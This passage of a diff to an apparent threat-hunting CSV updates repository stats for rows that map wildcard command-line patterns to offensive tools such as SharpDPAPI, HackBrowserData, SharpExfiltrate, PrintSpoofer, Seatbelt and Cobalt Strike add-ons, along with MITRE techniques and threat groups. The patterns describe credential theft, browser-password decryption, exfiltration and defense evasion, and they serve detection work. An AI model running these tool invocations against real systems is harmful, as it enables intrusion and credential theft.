Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
 "*.com/dcsync/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
 "*.com/SecureAuthCorp*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecureAuthCorp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*.com/SpiderLabs*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools adn documentation for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -2256,13 +2256,13 @@
 "*.docx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*.events.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
 "*.exe --b64 --path * --args ","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
-"*.exe certificates /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
-"*.exe -group=remote -computername=*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe certificates /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*.exe -group=remote -computername=*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
 "*.exe * -eventlog *Key Management Service*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
 "*.exe * --source Persistence*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
-"*.exe *.bin -enc aes -lang csharp*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z"
+"*.exe *.bin -enc aes -lang csharp*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z"
 "*.exe *-searchforest*-pwdlastset*","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","0","N/A","N/A","2","115","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z"
-"*.exe /disableLSAProtection*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z"
+"*.exe /disableLSAProtection*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z"
 "*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z"
 "*.exe action=GetScheduledTaskCOMHandler*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z"
 "*.exe action=ListRunningServices*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z"
@@ -2275,78 +2275,78 @@ "*.exe asktgt /user:* /rc4:* /createnetonly:*cmd.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden process. allowing you to e.g. steal the token from this process (requires elevation)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe asktgt /user:* /rc4:* /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Request a TGT as the target user and pass it into the current session","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe AzureStorage --connectionstring * --filepath * --extensions *","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" -"*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" -"*.exe -b all -f json --dir results -cc*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" -"*.exe backupkey /nowrap *.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*.exe certificates /mkfile:*.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*.exe -b all -f json --dir results -cc*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*.exe backupkey /nowrap *.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe certificates 
/mkfile:*.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "*.exe client *:* R:socks*","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe compute --sid * --kdskey *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" -"*.exe computername=* command=* username=* password=* nla=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* takeover=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* 
connectdrive=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* elevated=taskmgr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* elevated=winr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* exec=cmd*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* nla=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* 
password=* takeover=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* connectdrive=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* elevated=taskmgr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* elevated=winr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* exec=cmd*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe create /payload* 
/kb*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" -"*.exe credentials /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe credentials /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "*.exe -d * -u * -p * -m LDAPS*","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","72","16","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" -"*.exe -d 1 -c cmd.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*.exe -d 3 -c *powershell -ep bypass*","offensive_tool_keyword","PrintSpoofer","Abusing 
Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*.exe -d 1 -c cmd.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*.exe -d 3 -c *powershell -ep bypass*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe dump /luid:0x5379f2 /nowrap*","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe --eventviewer *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --eventviewer *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" 
"*.exe exec * cmd interactive*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*.exe Get-DomainController -Domain * -Server * -Credential *","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" -"*.exe -gettgs -luid:*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*.exe -gettgs -luid:*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*.exe gmsainfo --sid *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" "*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * --memoryonly*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data 
Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" -"*.exe -group=all *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -group=all -full*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -group=remote *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -group=system *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -group=user 